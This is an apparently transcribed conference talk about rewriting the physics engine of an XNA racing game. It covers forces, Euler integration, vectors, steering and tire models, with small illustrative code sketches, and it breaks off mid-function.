I've also added sort of a camera track mode and been sort of playing around with various bits during the game. So why am I doing all this? I'm really passionate about Microsoft Azure as it's now called and cloud computing. And I think there's some massive opportunities for organizations and for developers to start leveraging these cloud-based services. So that's basically what my main focus is. I was kind of a physics geek at school, so I was really into all this kind of stuff, you know, forces, masses, accelerations, vectors and doing all these types of calculations. It's something that I could naturally do and naturally get my head around when I was sat in the class at school. Probably one of the only things that I could naturally get my head around. I'm a Formula One fan, so I'm, you know, watching the races every weekend. And I'm really, really interested in the technology and the physics that goes into making these machines work. The Lotus team is actually sponsored by Microsoft and Avanade. And a lot of work has gone into using the services in Windows Azure to get the telemetry data from the car to the pit lane and then back to the actual factory in the UK so they can see what's going on in the actual racing as well. And I like playing driving games. Forza Horizon is one of my favorites. I like the way it's not, you know, a serious racing game. It's kind of an open world but with good physics and good playability. So I'm kind of more into that style of games. And as I mentioned, you know, the main scenario behind this is to provide an integration between the application and Azure. I deliver a lot of sessions on this. I use this in my training courses. I do racing game workshops where you can do hands-on labs integrating this stuff with Azure. And it's kind of a nice way of showing something that people can relate to and how it works with a cloud computing platform. So a bit about the game and simulator physics. 
Really, when you're thinking about building physics into a game or into an application, you've got to make a lot of decisions. And one of those is: are you going to focus on building a simulation, or are you going to focus on playability? So a couple of videos are basically going to show sort of what I mean by that. Now, when you look at a pure simulation, it's going to be something like this. This is at the actual Red Bull factory in the UK, and this is the actual kind of simulation rig that they use for Formula One cars. They cost millions and millions of dollars. They're highly complex, and they're really designed to provide the most accurate simulation they can of the actual car. They're limited in testing in Formula One, so if they put a new front wing on the car, they want to be able to model the downforce that that particular design of front wing will place on the car and how that will affect the car going around the track. So these fantastically complicated machines are basically, you know, what they're really focused on. So they're going in for the pure-simulation angle of things. If you look at, you know, what people start doing at home: is anybody into sim racing and, you know, building these kinds of rigs at home? I have a couple of friends in Sweden, and down in their basements they basically do things like this. So they spend, you know, sort of thousands and thousands on just building these types of things. A friend of mine got, from his wife for Christmas, two 27-inch monitors to go next to the other 27-inch monitor that he'd got in his basement, to basically build one of these driving rigs. So they're basically, you know, highly complex, and a lot of money gets put into these. And, you know, really, this is a game going towards the simulation side of things. These people get really offended if you say that they're playing games. They're not playing games. They're driving a simulator. It's not a game. It's a sim.
And they've kind of focused on those types of things: spending thousands of kronor on a gear stick or 10,000 kronor on a racing seat, just so they're going to get that simulation. And if you think these guys are bad, you should see what the actual flight sim people build. These flight sim rigs, you know, they get incredibly complex. There's one, you know, this is the one I was looking for. And you imagine what the wife-approval factor of building that in your dining room is going to be. But that, you know, is really focused on the simulation side of things. They really want the pure racing angle, whether it's flying or whether it's racing cars. However, maybe that's not going to be the thing that makes a game playable or makes an application, you know, worthwhile for the user. I'd hate to have a Formula One racing game where I'm driving for over an hour and then the engine overheats or one of the tires bursts. You know, because that would, you know, happen in Formula One. If I was pressing the accelerator pedal too hard, or if I was, you know, driving too fast around corners, it would destroy the tires, and the tires would burst, as sometimes happens during racing. So you've always got this compromise between, you know, building in some playability and actually having the, you know, totally accurate simulation for the people who are going to be actually driving these games. I saw this quote. I love this quote. And I can't remember where I saw it, if it was on a t-shirt or if somebody tweeted it or if it was just on a sticker on a website. And it's talking about the way that we can get immersed in computer games, much to the effect that the computer game physics seems more realistic than the real world.
I remember playing Quake and then going around the supermarket, and you get this thing where you're going around the aisle expecting a rocket to come down it, because you've been so immersed in that game world that it was starting to pinch into the real world. So that's one thing you have to think about when you're building physics into a game. The original XNA racing game — I've got a sample out here which is based on the original physics engine in the game. The idea behind this game was to develop something that was playable, and it used a lot of the XNA features. But what was not a high priority in the development of this game was implementing a physics engine. One of the things the developer decided not to do was reach out and use a commercial physics engine and bring that code into the game. So if we go in — I'm just going to change the settings so it looks a bit more appealing at this resolution — and start the race, you can drive around, and I kind of think that, considering the physics is so basic, the game has a fairly nice feel. You get the acceleration. In this modified version you can see the ghost cars coming from Azure Blob Storage from the other players in the lab. But if you start to think about what happens and how they've implemented it, they've taken a lot of shortcuts. The question is: does the player notice these shortcuts? The car does not steer — the car rotates. If I'm moving the mouse, we get this kind of rotation. You remember Asteroids in the 80s, that little ship that rotated? It's the same thing as that. So when you're going around a corner, you get around the corner if you can move the mouse quickly enough to rotate the car and change its direction.
There's no such thing as centrifugal force in this game. I took that corner at a really high speed; in the real world the car would have slid, there would have been some tire friction, and that's not present in the game. So when I was working with this game, I put it out on a ClickOnce deploy and a couple of my friends played it. One of them was my friend who's got the big sim rig in his basement and does a lot of sim racing, and his comment was: the game is okay, it's fun, it's a good way of showing off XNA — however, the physics in it is terrible. It doesn't do physics at all. You may as well be steering a banana around the track; you're just steering an object around a 3D landscape and there's nothing related to physics. So I thought, okay, if that's a problem — I'm a developer, I'll go in and fix it. What I decided to do, over Christmas, was rewrite the physics engine for this game. I was going to start with the XNA racing game code — I wasn't going to build my own game, because that's got a lot of the stuff in there that I need to play around with. All I'm going to do is swap out the physics engine and swap in my own. The game style I'm going for is fun, arcade-style gameplay. I also run racing game workshops, and the people who come to those workshops are mostly not really into simulation; they just want something that's nice and playable and maybe has a nice feel to it. So I'm focusing more on arcade-style gameplay than realistic simulation. The code I was going to use, and the ideas I was going to base this on, were the physics I learned at school.
Another scenario for this: I think it would be a great way of communicating with kids, getting them into programming and games, and also reinforcing that the stuff they're learning in school about vectors and matrices has real-world uses when you think about using them in games — because it is literally the stuff I was learning when I was 14, 15, 16 years old in the maths lessons at school. And that's the level of maths and physics I'm keeping it at: I'm not going into advanced physics or university-level physics, I'm keeping it at school-kid level. I wanted to learn a little bit about game physics. I've been playing games for a long time and I wanted to know what goes into making those games work. What I was not going to do was go into loads of massive complex equations and build realistic sim-style physics. I didn't want to bring in an existing physics engine, or start reading people's blog posts, or start copying and pasting big chunks of code into the application — I wanted it to be a real learning exercise for myself. And, as I mentioned, I wasn't going to take in an existing code sample for this, and I wasn't going to build on Unity. Unity, the game development platform, actually has a lot of physics support built into its own physics engine; it's got things like wheel colliders that you can use. But the people who come to my workshops, and the .NET developers I present to, want to be working in Visual Studio, and Unity — although you can use Visual Studio with it — has a very different development environment. So I wanted to keep people happy when they're working with the game. So this is what I did: I went in and rewrote the physics engine without really thinking too much about what I was doing and without actually doing any planning.
So the first thing was to get the car stationary on the track with no external forces acting on it whatsoever. The second thing was collision detection: I wanted the car to collide with the track in a realistic way, and when you collide with a barrier, you should be pushed back onto the track. One thing I wanted to include that's not in the original game is jump physics. I wanted a realistic way you could jump, and when the car landed it would properly simulate the way the car collided with the ground, and maybe put in some damage simulation to get that to work correctly. So as you can see, all of the physics is going wrong here. The other thing was loops. There are loops in the game, and I wanted a realistic simulation of how the car travels around a loop with centrifugal force. Now, watch the MPH on the car when we hit the earth: the car actually gets to a speed of 44 times the speed of sound in some of these segments. This was great fun — my daughter loved it, she kept wanting to play this game with the flying car, with these cars flying around. I find it really funny just playing around with these numbers and equations when this starts happening, and you're trying to debug it — and debugging something that runs at 100 frames a second, or 50 frames a second, is very, very challenging to do. So I stepped back from there. I did get a bit depressed for a while, until I started going around on YouTube and looking at what happens in real commercial games as well. That was Scania Truck Simulator — I'm not sure what this game is, but there's something very wrong going on with the physics. This one's GTA; I thought the physics was good.
I just included this one because there is actually no car for some reason — it's missing the rendering of the car. And Forza Horizon, one of my favorite games, has this glitch where the car can actually go off the end of the world. You can see that two of the wheels are actually working on the ground but the other two aren't, and there's this beautiful section here where you drive through and the car falls through the game world. I'm glad it's not just me who sees the underside of a game world with the car falling and spiraling away like that. I really like the energy that people put into games and physics. One of my favorite examples is this, which was available on Steam: a game called Next Car Game. Excuse the advert that will come up in a couple of seconds — I can skip this. What they did was put out this test bed application to test the physics engine, so players could go around and have fun with it. The thing was, this test bed application was actually a lot more fun than the game that was produced out of it, and so many people were just going in and downloading this demo to play with the physics. The destruction physics they've put in — again, this isn't real world, but they're simulating a lot of the forces on the car in the destruction physics; that's really what they're going for. And I think it's a fantastic user experience to see how this works and what happens when you drive through something like a mangling machine, with all of the bits flying around. And the car can still reverse and go through the next one, and it comes out like that and bounces around, and the engine still works and the wheels still rotate even when the car is in that state.
So it's really impressive what they can do putting that amount of energy into working with those formulas, and the gaming platforms that are coming out can actually do the sums that make this type of stuff possible. Does anybody know who this guy is? Isaac Newton — and it's not James May from Top Gear, although it does look very like him. Everybody learns about him at school: he came up with the laws of motion and the theory of gravitation, and he's really famous for that. A lot of the stuff I've used in the game is based on those laws of motion and gravitation. This one's a bit harder. Euler? Yeah, you're the first person who's got that — and I've done this session a lot of times — and you've also pronounced it correctly as well: Leonhard Euler. A couple of things he was responsible for. One of them is Euler integration, which is a basic way of doing simulation in game physics, and I'll talk about how that works a bit later on. It's not the best way to do it, but it's probably the easiest way to get in and start simulating physics. When I was reading up on him, another thing he had worked on is graph theory, which was really interesting because that's now becoming something that's really talked about with graph databases and social networks — Twitter and Facebook and all the relations of how you follow certain people and certain people follow you. He was behind a lot of the groundwork for that theory too. So what I started doing was working out the forces that are going to be applied to a car. So: there's a car. We've obviously got gravity pulling the car down onto the track. The car's going to be going forward — we've got an engine which is powering it, so we've got some kind of traction force. We've also got some kind of rolling friction.
As the car starts to move, rolling friction is the friction of the wheels going around, the tires on the road, all of the mechanical joints within the car. When you start pushing a car, it's the momentum and the rolling friction that you're overcoming to get the car to move. So at low speeds, rolling friction is going to be the biggest inhibitor of force on the car. As the car accelerates, aerodynamic drag is going to overtake the rolling friction. Does anybody know why? Rolling friction is proportional to velocity: if you double your velocity, you get two times the rolling friction. Aerodynamic drag is proportional to the velocity squared: if you double your velocity, you get four times the aerodynamic drag. So aerodynamic drag is one of the really big forces on the car. That's why, if you accelerate from 100 kilometers an hour to 110 kilometers an hour, the fuel efficiency of your car drops off a lot — there's a lot more aerodynamic drag for that small extra speed. Now if your car's designed correctly, if it's a racing car — and this is what they really go into in Formula One with their simulations and the way they design the cars — you get downforce, which pushes the car down onto the track. That means you can go around corners faster, because the ratio between your downforce and the sideways centrifugal force is going to be greater, and that's going to hold the car on the track. So Formula One drivers are really into maximizing downforce. And once we've calculated these forces, we can work out the acceleration on the car. Because, as Newton says, force is equal to mass times acceleration, so acceleration is equal to the force divided by the mass. The weight of the car is going to determine how fast the car accelerates.
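To make that concrete, here is a minimal sketch of those longitudinal forces in Python (the talk's actual engine is C#/XNA; the coefficients `C_RR` and `C_DRAG` are made-up illustrative values, not the game's constants):

```python
# Longitudinal forces on the car: rolling friction grows linearly with
# velocity, aerodynamic drag grows with velocity squared.
C_RR = 30.0      # rolling resistance coefficient (illustrative)
C_DRAG = 0.43    # aerodynamic drag coefficient (illustrative)

def longitudinal_force(engine_force, velocity):
    """Net forward force = engine traction - rolling friction - aero drag."""
    return engine_force - C_RR * velocity - C_DRAG * velocity ** 2

def acceleration(engine_force, velocity, mass):
    # Newton's second law: a = F / m
    return longitudinal_force(engine_force, velocity) / mass
```

With these numbers, rolling friction dominates at low speed and drag takes over at high speed, exactly the crossover described above.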
So applying these basic laws of motion to, say, a car driving off a barrier like that, you'd do something like this: s equals ut plus half at squared. Again, this is physics you learn at school. The displacement is s, which tells you where you're going to land; u is the initial velocity — and if you're talking about the vertical velocity, that's going to be zero; t is the time; and a is the acceleration. So you can calculate — and this is what you do to pass exams at school — where the car is going to land based on how fast it's traveling and how high the barrier is. But you make some assumptions. First, you assume there's no air resistance. Second, you may assume the earth is flat, which you can do in these simulations where you're talking about a small game world. So Euler integration basically says: okay, we're going to do these same calculations again, but we're going to do them a lot of times — multiple times a second. You'll have a frame rate for your game, and this calculation is done every frame before you do your rendering. So Euler integration does these calculations step by step, and you end up with something like that. This is where the inaccuracies come in. And I've noticed in the game that, because XNA uses floats rather than doubles for its vectors, you get a lot of floating-point inaccuracies. If the game is running at 50 frames a second, the car will accelerate a lot faster and go faster than if the game is running at 100 frames a second, because at the higher rate you're doing a lot more calculations and you get a lot more inaccuracies in the engine. I had scenarios where, running at a low resolution, the game would run at 250 frames a second and the car just wouldn't accelerate. So we do need to go in and put in compensations for that.
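As a rough illustration of why step size matters, here is a toy explicit-Euler integration of a falling body in Python (not the talk's code), compared against the exact schoolbook answer s = ut + ½at² with u = 0:

```python
# Explicit Euler: advance position and velocity in small fixed steps.
def euler_fall(steps, dt, a=9.81):
    v, s = 0.0, 0.0
    for _ in range(steps):
        s += v * dt   # position uses velocity from the start of the step
        v += a * dt
    return s

exact = 0.5 * 9.81 * 2.0 ** 2        # fall for 2 seconds, exact answer
coarse = euler_fall(20, 0.1)         # 2 seconds in 20 big steps (low frame rate)
fine = euler_fall(200, 0.01)         # 2 seconds in 200 small steps (high frame rate)
```

The coarse and fine runs simulate the same two seconds but land at different displacements, which is exactly the frame-rate-dependent behaviour described above.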
Again, it's the question: are you going for playability or an actual physical simulation? Terminal velocity is another thing — and terminal velocity is very misunderstood. The people who understand it best are skydivers, because they need to; their lives depend on it. Terminal velocity is when the force on an object due to gravity is equal to the force due to aerodynamic drag, and you reach an equilibrium where you free-fall at a constant speed. A skydiver falling out of a plane in the belly-down position, with the wind against their stomach, will fall at about 125 miles an hour. The world record for speed skiing is close to 200 miles an hour — they may have exceeded 200 miles an hour — which is 75 miles an hour faster than skydivers fall, because speed skiers go into a tuck position. Snow has a very low terminal velocity because it has a low mass compared to its air resistance, so it falls very slowly. So terminal velocity isn't a constant — things fall at different speeds because of air resistance. Now if we turn that the other way round, the car will have a terminal velocity, because eventually the aerodynamic drag is going to equal the force put in by the engine, and the car won't be able to accelerate any faster than that. It gets more complex when you start to bring in gear ratios and max RPM and rev limiters like they have in Formula One — normally they reach terminal velocity when they hit the rev limiter in the highest gear they've got. Another thing we've got to think about is how the car goes around corners. Now, as I mentioned, in the original version of the driving game the car rotated — and I wanted the car to steer.
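Setting weight equal to quadratic drag gives a closed form for terminal velocity. A small Python sketch (the drag coefficient here is illustrative, not fitted to a real skydiver or car):

```python
import math

def terminal_velocity(mass, g, drag_coefficient):
    """Speed where drag (c * v^2) balances weight (m * g): v = sqrt(m*g / c)."""
    return math.sqrt(mass * g / drag_coefficient)
```

Heavier objects with the same drag fall faster, which is why a snowflake — tiny mass, relatively large air resistance — drifts down slowly while a tucked speed skier beats a belly-down skydiver.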
So I started drawing all these diagrams on bits of paper, saying: if the wheels turn like this, then we've got a turning circle, and we've got a wheelbase, and from the steering angle we need to calculate the turn radius. So we're doing various sums to get these calculations working — and this was again stuff I did with a pencil and paper, figured out from what I'd learnt at school, using sines, cosines and tangents to take these various angles and calculate what the outputs are going to be. So I've got a lot of formulas like that, where I'm returning one property based on various other properties in the engine. What's going to happen as you go around a corner is you're going to get lateral force. The lateral force is pulling the car sideways, and you've got to start calculating how that plays in with all of the other forces acting on the car. Within the game we typically have something called a game loop, and the game loop looks something like this. While you're playing the game, you get the player input — that's coming from the keyboard, from the mouse, from an Xbox controller. Once you've got the player input, you feed it into the physics engine. Then you do the Euler integration calculation, calculating all the game physics, which figures out where everything is going to be in the game. After that, the next thing you do is render everything and put it on the screen. So you're just whizzing around that loop 50 times a second if you're running on fairly decent hardware — maybe 80 or 100 times a second, maybe 30. And I've actually built the game to run as a variable frame rate game.
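A common pencil-and-paper version of those steering sums is the "bicycle" approximation, where the turn radius comes from the wheelbase and the front-wheel angle. A hedged Python sketch (this is the standard textbook model, not necessarily the exact diagrams from the talk):

```python
import math

def turn_radius(wheelbase, steer_angle):
    """Bicycle-model turn radius: R = wheelbase / tan(steering angle)."""
    return wheelbase / math.tan(steer_angle)

def lateral_force(mass, speed, radius):
    """Sideways (centripetal) force pulling the car off line: m * v^2 / R."""
    return mass * speed ** 2 / radius
```

Note the square on speed: doubling your cornering speed quadruples the sideways force, which is why the car slides out in the demo when a corner is taken too fast.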
So it takes into account the frame time we get from the game engine every time it does this calculation. Sometimes, when you get more objects on the screen, the frame rate will slow down, but because the calculations are scaled per second, the car should always feel like it's travelling at the same speed, even if the frame rate of the game changes — which it will do depending on what's going on. As you can see, this is what I'm doing: when I call into the game — and this is XNA code — I'm getting this floating-point value, the move factor. The move factor is the fraction of a second the frame took: if you're running at 10 frames a second it's 0.1, at 100 frames a second it's 0.01, and so on. I then go into the physics engine, pass in that variable, and it does all of the calculations based on that particular move factor. Then we update the car's position. We have a matrix data structure — you've got matrices in XNA, and you've got them in Unity as well — which basically describes how the car is displayed on the screen. We call this method to update the car matrix and the camera, and that gives us the position of the car, and then we can place the car on the track. Now, that's very simplified compared to what it looks like in the game — it's quite a bit more complex than that. So once I'd gone through and come up with the formulas, before going into the 3D world — because that's where everything would really go pear-shaped if I just tried to code it off the top of my head — I decided to simplify things a bit. I decided to start this off in 2D and see what happens when we build a 2D simulation. So this is what I was playing around with first.
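The idea is that physics advances by elapsed time rather than by frame count, so different frame rates cover the same ground. A tiny Python sketch of that pattern (the names here are mine, not the game's):

```python
# Frame-rate-independent movement: scale each update by the frame's elapsed
# time ("move factor") instead of moving a fixed amount per frame.
def update_position(position, velocity, move_factor):
    """move_factor is the frame time in seconds: 0.1 at 10 fps, 0.01 at 100 fps."""
    return position + velocity * move_factor

def simulate(frames, move_factor, velocity=30.0):
    """Run a fixed number of frames and return the distance covered."""
    pos = 0.0
    for _ in range(frames):
        pos = update_position(pos, velocity, move_factor)
    return pos
```

One second of game time at 10 fps and at 100 fps should then cover (essentially) the same distance, up to the floating-point drift the talk complains about.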
It's a very simple Windows Presentation Foundation application with a timer going in the background. What I'm doing is the calculation that I had in the slide deck — it's basically this here: I'm figuring out what the steering angle of the wheels is. Then, if we apply some throttle, you can see I've got some basic telemetry data that I use for debugging coming out at the bottom of the screen. We can give the car some velocity and then I can start doing some turns. I colored it so the wheels turn red when the car starts sliding. You can see at slow speeds we can turn okay; however, as the speed increases, if we try to make too sharp a turn, the car slides, and it slides out like that. What I was focusing on here was getting some fairly realistic variables into the way we define the car. So what I'd done was think about all of the dimensions of the car. We've got a bunch of constants — stuff that does not change. Now, if you're building different car models in the game, you'd be swapping out those constants: different mass, different acceleration, different engine power, different wheelbase, maybe different friction coefficients if you're doing that sort of thing. And if you play Forza, you can go in and customize your car, which will affect lots of stuff in the physics engine — it affects these constants. I've got the driver input, which is steering angle, throttle and brake percentages. I've also got KERS and DRS — if you're a Formula One fan, you'll probably know what those mean, and I'll talk about that stuff a bit later on. Then I've got the variables: the position, which is going to be a point; then the direction, the downforce — and I'm using 2D vectors here for velocities and things like that.
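That split between per-model constants and per-frame driver input might look something like this in Python (field names and numbers are illustrative stand-ins for the talk's C# constants, not the actual game code):

```python
from dataclasses import dataclass

@dataclass(frozen=True)
class CarSpec:
    """Constants that define a car model; swap these to change cars."""
    mass: float              # kg
    engine_power: float      # max traction force, N
    wheelbase: float         # m
    drag_coefficient: float
    rolling_coefficient: float

@dataclass
class DriverInput:
    """Per-frame inputs from keyboard, mouse or controller."""
    steering_angle: float = 0.0  # radians
    throttle: float = 0.0        # 0..1
    brake: float = 0.0           # 0..1
    kers: bool = False           # Formula One style boost
    drs: bool = False            # drag reduction system

default_car = CarSpec(mass=1200.0, engine_power=9000.0, wheelbase=2.6,
                      drag_coefficient=0.43, rolling_coefficient=30.0)
```

Making the spec frozen mirrors the "constants" idea: a customized car (as in Forza) is a new spec, not a mutation of the old one.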
Now, when I was playing around with this stuff, I was taking a mix between doing the physical simulation and — really the main thing — how does this feel? When I do that, does it feel like the car is sliding around a corner? Does it feel like it's sliding correctly? I have been playing around with these variables a lot, so it may not be simulated exactly as it should be, but I was really focusing on the feel. A couple of things I am simulating here as well: the downforce. If we use the drag reduction system, that reduces the downforce on the car and makes the car go faster — it reduces drag and reduces downforce — which means you are going to slide off around the corners a lot more. So I was really just running the simulations to see how that worked. And when I was happy with that, I moved on to the 3D world and started thinking about getting it implemented in the game. For 3D gaming, we are going back to school and working with vectors and matrices — but instead of 2D vectors, we are going to be looking at a lot of 3D vectors. This is the same whether you are using XNA or Unity: they both have this vector class with three components, and you also have 2D vectors and 4D vectors for other things you'll work with in the game. So this is fairly simple: you've got a point on the X, Y and Z axes, and that projects out to a vector like this. Nothing too complex about that. Then there is how vectors are used — vectors are used a lot in XNA for different things. Now, you could argue that a position is a point — well, a point is really just a data structure that contains an X, Y and Z coordinate — so they basically use the vector as a point as well.
And you can think of it as a vector giving the distance you are from (0, 0, 0) in the game world, so it can be used for the position of the car — all of the items will have a position in the 3D game world. Then you've got the direction: where is the car facing, which direction is it pointing in? You use 3D vectors for those too. These are often normalized vectors, so the length of the vector is always 1, but its X, Y and Z values determine which direction that one unit of vector is pointing in. Then there's velocity — the speed and direction of travel, which is very important — that's also a vector. And then you've got acceleration, the change in velocity, which is another vector. And all of the forces on the car, like gravity, are also going to be vectors. So what we are really doing in the game is these calculations: we've got the weight of the car, the engine force, the road friction, the aerodynamic drag and the downforce, and what we're really doing is taking these vectors and adding them together. The resultant force we get is the force applied to the car, and then, since force is equal to mass times acceleration, we can calculate the acceleration on the car. This is an actual snippet from the game code where I'm using the Vector3 class and saying: the force is going to be gravity multiplied by mass, plus the engine force, plus the friction, plus the drag, plus the downforce. And that tells us what's happening to the car. This all did not go according to plan — some things did go wrong. One of the classic ones was getting downforce the wrong way round: I forgot to use a minus sign, so downforce was upforce.
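The same sum can be sketched with plain tuples standing in for XNA's Vector3 (this is an illustration of the calculation described, not the game's snippet):

```python
# Component-wise vector arithmetic: the resultant force is just the sum
# of the individual force vectors.
def vec_add(*vectors):
    return tuple(sum(cs) for cs in zip(*vectors))

def vec_scale(v, s):
    return tuple(c * s for c in v)

GRAVITY = (0.0, -9.81, 0.0)   # m/s^2, pointing down the Y axis

def total_force(mass, engine_force, friction, drag, downforce):
    """force = gravity * mass + engineForce + friction + drag + downforce"""
    return vec_add(vec_scale(GRAVITY, mass), engine_force, friction, drag, downforce)

def accel_from_force(force, mass):
    # F = m * a, so a = F / m, component-wise
    return vec_scale(force, 1.0 / mass)
```

Flip the sign on the downforce vector and you get exactly the "downforce was upforce" bug described next: a force pushing the car off the track instead of onto it.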
So I went really, really fast, went off a jump, and the car basically had upforce on it. It took off like a plane and flew away, and eventually the wind resistance brought it down to the ground. But it shows you can just change a few things around and you're building a flight simulator rather than a driving simulator once you've got those calculations. A couple of things that are useful with vectors, which you may remember from school or may have forgotten: cross product. This is taking the direction and the up vector of an object and being able to figure out where the right direction is for it. So if your car is going forwards and you know which direction is up for the car, you can figure out which direction the centrifugal force will be acting on the car by using the cross product. That's used quite a lot in the game: the right direction of the car is equal to Vector3.Cross, passing in the direction we're travelling in and the up vector, and a lot of calculations use that. Dot product is used for taking a couple of vectors and calculating the proportion of one vector that is acting in the direction of the other vector. Here we're interested in the force of the car on the track, so that's going to be the mass multiplied by the dot product of gravity and the down vector of the car — and as the slope gets steeper, the force of the car on the slope is going to be less and the wheels are going to start slipping. So, the homebrew physics engine that I built — and again, this is something I wanted to build myself rather than looking at how real physics engines work — this is what I did. I calculated, based on the force and acceleration, where the car wanted to be at the next frame.
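For reference, the two operations in plain Python (the slope example uses a hypothetical car "down" vector; the axis and sign conventions here are mine, not necessarily the game's):

```python
def cross(a, b):
    """Right-handed 3D cross product of two (x, y, z) tuples."""
    ax, ay, az = a
    bx, by, bz = b
    return (ay * bz - az * by, az * bx - ax * bz, ax * by - ay * bx)

def dot(a, b):
    """Sum of component-wise products: how much of a acts along b."""
    return sum(x * y for x, y in zip(a, b))

def normal_force(mass, g, car_down):
    """Force pressing the car onto the track: m*g scaled by how well the
    car's (normalized) 'down' vector lines up with world down."""
    world_down = (0.0, -1.0, 0.0)
    return mass * g * dot(world_down, car_down)
```

On a flat track the car's down vector matches world down and you get the full m·g; tilt the car on a slope and the dot product — and with it the grip — drops off.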
This type of calculation is fairly straightforward. If the car is going off a cliff, travelling at a certain speed, then the next-frame position based on all of my calculations puts the car there — no problem, it's going to be there. However, if we're going along a straight road, the car wants to be down there, but it's not going to be, because the road is blocking it from falling there; the car is actually going to be on the road. So what I did then was calculate the difference between where the car wants to be and where the car is going to be, and that difference we can treat as an acceleration. We can basically say the force acting on the car is proportional to the length of that line. That lets me calculate the downforce at the track — downforce and gravity are pushing the car down, we reposition the car, and then calculate the force, and that gives us the downforce, the force on the tires. That's how I'm calculating downforce. So if we've got a track section that looks like this, the car wants to be here, but it's going to be here, and the force is going to be greater. Looking at the telemetry data, when the car goes at full speed around one of the loops in the game, I think there's 44G being placed on the car — massive gravitational force there. And again, it's back to sim versus the real world: do you really want to model what would happen if you drove a real car around a loop at 44G? It would break. Do you want that to happen in the game? Or do you just want to make a game that's fun to play? You have to think about things like that as well.
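That "where it wants to be versus where the track lets it be" step can be sketched as a simple penetration-based constraint in Python (my own simplification of the approach described, with a made-up stiffness constant):

```python
def constrain_to_track(desired_y, track_y, stiffness):
    """Clamp the car's desired height to the track surface.

    Returns the corrected height and a spring-like normal force proportional
    to how far the desired position penetrated the track. `stiffness` is a
    tuning constant, as in the talk's homebrew approach.
    """
    if desired_y >= track_y:
        return desired_y, 0.0          # airborne or resting: no track force
    penetration = track_y - desired_y
    return track_y, stiffness * penetration
```

Off a cliff the desired position is above the ground, so nothing happens; on the road the penetration depth turns into the downforce on the tires — and going flat out around a loop, that penetration-derived force is what spikes to the reported 44G.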
And then if you're going over the crest of a hill, the car wants to be here and you've got very little force. So on certain sections of the game, if you're going over the top of a hill and you attempt to take a corner, the car's just going to slide, because there's no real force — or only a very small force — between the car and the track, and it takes only a little bit of centrifugal force to make the car slide around. So after I'd played around in the 2D world, I went into the 3D world. I was really inspired by what they'd done in that Next Car Game demo, and I said, okay, let's do the same thing where I've got a test track like I had in the 2D world, and again focus on the feel of how the car is going to drive. I spent quite a lot of time watching this, which is a clip from the BBC's Top Gear — again, apologies for the advert. They took three high-performance cars out to a beach in Wales and just spent a lot of time driving them round and round in circles in the sand. And I thought the feel and the look of the way those cars slide around the corners — it would be fun to have a driving game that did that. So that's one of the things I was looking at as I was working on the game engine. Going into the game engine itself: I've got a flag here called skid pad, which I can set to true. If skid pad is set to true, it doesn't render the track; it just renders this square, and we've got the car driving around on that test track. So it looks something like this if I go into the game.
What I wanted to simulate I've actually hard-coded in, so we leave tyre tracks even when we're not skidding — this is just so I could see where the car has driven. The wheels aren't skidding there; it's just leaving tyre tracks like it would in the sand. And here's the car actually sliding around — you can see it doing a corner slide here — and I can use brakes, use acceleration, and basically simulate how the car drives. I wanted to get happy with that model before I started getting the car to run on the track with all of the collision detection and so on. So I spent quite a bit of time trying to get the numbers right so it would actually feel a bit like a car sliding around a track. Now, I'm making really simple assumptions here. If you're thinking about doing more serious simulations, there's Pacejka's "magic formula", which I'm not going to attempt to pronounce, but this is basically what a lot of racing games use. It's a formula somebody came up with to calculate what's called a tyre friction curve, which simulates, for each of the four wheels on the car, how the tyre is going to slip based on various inputs we feed into the formula. So it generates curves like these, and you can see the code for the formula is very complex. There are also C# implementations of the formula if you want to plug them in. But that magic formula, as they call it, will basically give you something like this based on the actual force. That's what you can do.
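The core of that magic formula is compact, even if the full tire model around it is complex. Here's a minimal C++ sketch of Pacejka's formula itself; the B, C, D, E coefficients below are illustrative placeholders, since real values come from measured tire data and vary with load and tire.

```cpp
#include <cassert>
#include <cmath>

// Pacejka's "magic formula": maps slip (angle or ratio) to tire force.
// B: stiffness, C: shape, D: peak force, E: curvature (illustrative values).
double pacejka(double slip, double B, double C, double D, double E) {
    double Bx = B * slip;
    return D * std::sin(C * std::atan(Bx - E * (Bx - std::atan(Bx))));
}
```

Evaluated over a range of slip values it produces the characteristic friction curve: force rises with slip, peaks, then falls off as the tire lets go.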
But I really didn't want to copy-paste that big chunk of code in; I wanted to stick to something a bit more basic for the physics simulation. So what I can do now is set skid pad equal to false, and that drops the game back into the regular game mode, which should hopefully give us the physics engine working in the actual game itself. So I'll go to play, take the Azure car onto the middle track here, and switch over to the Xbox controller — the XNA driving game does support Xbox inputs. So I do have my KERS and my DRS; I'll talk about those a bit later on. KERS allows me to accelerate, and DRS reduces my drag. You should hopefully see the jump physics coming into the game — I wanted to make it so you could jump through the loops on the other tracks and land like that. Also, if I attempt to drive at full speed around a corner, I'm going to slide off and crash; I wanted to build in that type of physics. You can see there are a couple of glitches in here, especially when you hit the barriers, and even when you're just driving in a straight line, which I'm still trying to iron out. I'm figuring that this is probably related to the floating-point calculations we're doing in the game, so I'm going to try to iron those out and get the game running a bit more playable. And there are certain sections in the game where you will actually fly off the track — if you're driving and you hit a jump, there are several sections where the car will leave the track.
I've designed the track layouts so those sections are there, just to make it a bit challenging. Incidentally, if you're playing around with the game, one thing I really liked was the way the track design works. For one of the tracks, you've got about 15 points in 3D space; it calculates a 3D spline and then creates the actual track from that spline. It puts in all of the barriers, all of the lights, and warning signs where you've got corners and such. So you don't have to design the track completely — you can just change the points in 3D space, raise a point by 10 metres, and it will draw the entire track going over that jump. That makes it really easy to do track mods, and I've spent quite a lot of time modding those tracks. So, on to KERS and DRS. One of the things I'm doing with this game is storing the telemetry data. I can show you this on the website — I don't have too much data in there, but if I go to the Red Dog Racing website, we should be able to go into the lap data for Alan, see the laps I've driven, and select one of the laps I've completed. When you select a lap, it shows the telemetry data for that lap. This is sampled by the driving game ten times a second, with messages sent once a second to the Service Bus. This is the same thing they do in Formula One — they talk a lot about telemetry data and comparing telemetry data, and they process gigabytes of this stuff every race weekend. So this is the speed and the actual damage.
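The "15 points in 3D space become a whole track" step comes down to spline interpolation. A Catmull-Rom spline is one common choice for this (an assumption on my part — the talk doesn't say which spline the game uses); it passes exactly through the control points, so raising one point by 10 metres smoothly lifts the track around it. A minimal C++ sketch:

```cpp
#include <cassert>
#include <cmath>

struct Vec3 { double x, y, z; };

// Catmull-Rom interpolation between p1 and p2 for t in [0,1],
// using p0 and p3 as the neighbouring control points.
Vec3 catmullRom(const Vec3& p0, const Vec3& p1,
                const Vec3& p2, const Vec3& p3, double t) {
    auto interp = [t](double a, double b, double c, double d) {
        double t2 = t * t, t3 = t2 * t;
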